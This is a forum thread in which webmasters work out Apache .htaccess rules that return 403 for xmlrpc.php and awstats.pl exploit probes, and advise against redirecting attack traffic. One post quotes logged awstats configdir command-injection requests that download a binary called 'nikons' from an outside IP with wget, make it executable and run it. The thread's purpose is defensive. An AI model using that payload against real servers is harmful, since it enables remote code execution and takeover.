RewriteRule xmlrpc\.php - [NC,F]

Jim

Thank you Jim,

do you think it can be done also as RedirectMatch permanent like this? :

<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)\/xmlrpc\/\.\.(.*)$ [microsoft.com...]
</IfModule>

The proper response is a 403 or a 501.

Your code won't work properly, because you need to check for mod_alias.c if you're going to use RedirecMatch.

<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
</IfModule>

For anyone reading this thread: Using a 301 redirect to handle malicious attempts on your server is dangerous and somewhat irresponsible, because most bad-bots don't follow redirects...

And if the bad-bot *does* follow your redirect:

It makes the target (Microsoft in this case) think *your server* may be the source of this exploit, since you're the referer

It only wastes more internet bandwidth, slowing down the Web for everybody

The same goes for redirecting hotlinking or any other exploit. If you try to get 'tricky' or 'take revenge,' you're likely to get yourself in trouble. You probably don't want Microsoft to report your server's IP address to the IBL or other public IP address blacklists, right?

Just 403 these attempts and be done with it.

Jim

Thank you for the explanations Jim, i'll gor for a 403.
tito

Please Jim, if i have also to block a dir. like: cgi-bin etc.. would be fine like this?

<IfModule mod_alias.c>
RedirectMatch 403 cgi-bin
</IfModule>

if i also type \.php or \.html etc.. after, it means that both dir. name and file name with those extensions are blocked?

Thanks in advance,
tito

i'm trying different options to stop such requests, this one from Jim is working and it serves a 403:

<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
</IfModule>

so i've tried to add as follows to stop also this type of request
/awstats/awstats.pl?configdir=¦echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20
%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo¦

or

/cgi-bin/awstats/awstats.pl?configdir=¦echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons
%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo¦

<IfModule mod_alias.c>
RedirectMatch 403 xmlrpc\.php
RedirectMatch 403 awstats\.pl
</IfModule>

but it doesn't show up a 403 on these awstats requests,
please what i'm doing wrong?

Thanks so much,
tito

[edited by: jdMorgan at 6:41 pm (utc) on Dec. 19, 2005]
[edit reason] Fixed side-scroll [/edit]

If awstats exists in directory /cgi-bin, and if directory /cgi-bin is an "alias" directory owned by your hosting company, then your .htaccess file cannot affect requests to that directory. See Apache mod_alias.

That's the only reason I can think of that your code would not work.

Jim

Is there any point 'blocking' these requests? The only effect this will have is instead of receiving a 404 error, the client will get a 403 error. The client doesn't care - it's an automated program.

You are making your configuration more complex for no increase in security,

Hello Jim,

It's my own Server: Apache/2.0.52 (BlueQuartz)
there is not a cgi-bin dir. but there is an awstats/ dir. with the file awstats.pl but i'd like also to block requests to cgi-bin even if it doesn't exist just to give a 403 instead a 404

the problem here is that i'm getting an huge number of such PHP vulnerability attacks [isc.sans.org...]

i have been digging the forum and found a very nice workaround you posted [webmasterworld.com...]
but it seems that i can't make it to work, so the only chance for me is to use RedirectMatch 403 as above.
the problem is that i can't block the requests to awstats with RedirectMatch 403 awstats\.pl , actually i can block the xmlrpc\.php only.

i wonder how should i block (403) those specific request to awstats as above mentioned.

Hello py9jmas,
these requests are so many that by serving a 404 it's consuming a lot of bandwidth, i have a very nice 403 (1kb) instead that i'd like to serve to them.